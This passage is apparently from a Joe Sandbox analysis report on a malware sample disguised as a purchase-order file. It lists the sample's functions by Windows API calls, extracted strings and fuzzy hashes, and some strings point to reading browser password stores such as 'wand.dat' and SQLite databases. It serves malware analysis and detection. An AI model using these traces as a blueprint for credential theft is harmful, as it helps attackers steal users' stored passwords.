                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                              • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID: SHAutoComplete$shlwapi.dll
                                                              • API String ID: 3150196962-1506664499
                                                              • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                              • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                              • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                              • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                              APIs
                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp
                                                              • String ID:
                                                              • API String ID: 3384217055-0
                                                              • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                              • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                              • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                              • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                              • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                              • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                              • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                              APIs
                                                                • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                              • GetMenu.USER32(?), ref: 00410F8D
                                                              • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                              • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                              • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                              • String ID:
                                                              • API String ID: 1889144086-0
                                                              • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                              • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                              • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                              • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                              APIs
                                                              • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                              • GetLastError.KERNEL32 ref: 0041810A
                                                              • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateErrorHandleLastMappingView
                                                              • String ID:
                                                              • API String ID: 1661045500-0
                                                              • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                              • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                              • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                              • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                              APIs
                                                                • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                              • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                              Strings
                                                              • Cannot add a column to a view, xrefs: 0042EBE8
                                                              • virtual tables may not be altered, xrefs: 0042EBD2
                                                              • sqlite_altertab_%s, xrefs: 0042EC4C
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                              • API String ID: 1297977491-2063813899
                                                              • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                              • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                              • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                              • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                              APIs
                                                              • memset.MSVCRT ref: 0040560C
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.*$dat$wand.dat
                                                              • API String ID: 2618321458-1828844352
                                                              • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                              • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                              • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                              • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                              • wcslen.MSVCRT ref: 00410C74
                                                              • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                              • _wcsicmp.MSVCRT ref: 00410CCE
                                                              • _wcsicmp.MSVCRT ref: 00410CDF
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                              • String ID:
                                                              • API String ID: 1549203181-0
                                                              • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                              • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                              • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                              • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                              APIs
                                                              • memset.MSVCRT ref: 00412057
                                                                • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                              • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                              • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                              • GetKeyState.USER32(00000010), ref: 0041210D
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                              • String ID:
                                                              • API String ID: 3550944819-0
                                                              • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                              • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                              APIs
                                                              • free.MSVCRT ref: 0040F561
                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$free
                                                              • String ID: g4@
                                                              • API String ID: 2888793982-2133833424
                                                              • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                              • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                              • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                              • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                              • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                              • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                              • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                              • memset.MSVCRT ref: 0040AF18
                                                              • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID:
                                                              • API String ID: 1865533344-0
                                                              • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                              • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                              • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                              • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                              APIs
                                                              • memset.MSVCRT ref: 004144E7
                                                                • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                              • memset.MSVCRT ref: 0041451A
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                              • String ID:
                                                              • API String ID: 1127616056-0
                                                              • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                              • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                              • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                              • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                              • memset.MSVCRT ref: 0042FED3
                                                              • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: sqlite_master
                                                              • API String ID: 438689982-3163232059
                                                              • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                              • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                              • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                              • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                              APIs
                                                              • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                              • wcscpy.MSVCRT ref: 00414DF3
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: BrowseFolderFromListMallocPathwcscpy
                                                              • String ID:
                                                              • API String ID: 3917621476-0
                                                              • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                              • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                              • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                              • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                              APIs
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                              • _snwprintf.MSVCRT ref: 00410FE1
                                                              • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                              • _snwprintf.MSVCRT ref: 0041100C
                                                              • wcscat.MSVCRT ref: 0041101F
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 822687973-0
                                                              • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                              • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                              • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                              • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7556DF80,?,0041755F,?), ref: 00417452
                                                              • malloc.MSVCRT ref: 00417459
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7556DF80,?,0041755F,?), ref: 00417478
                                                              • free.MSVCRT ref: 0041747F
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.2668533992.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.2668533992.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000008.00000002.2668533992.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$freemalloc
                                                              • String ID:
                                                              • API String ID: 2605342592-0
                                                              • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                              • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                              • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
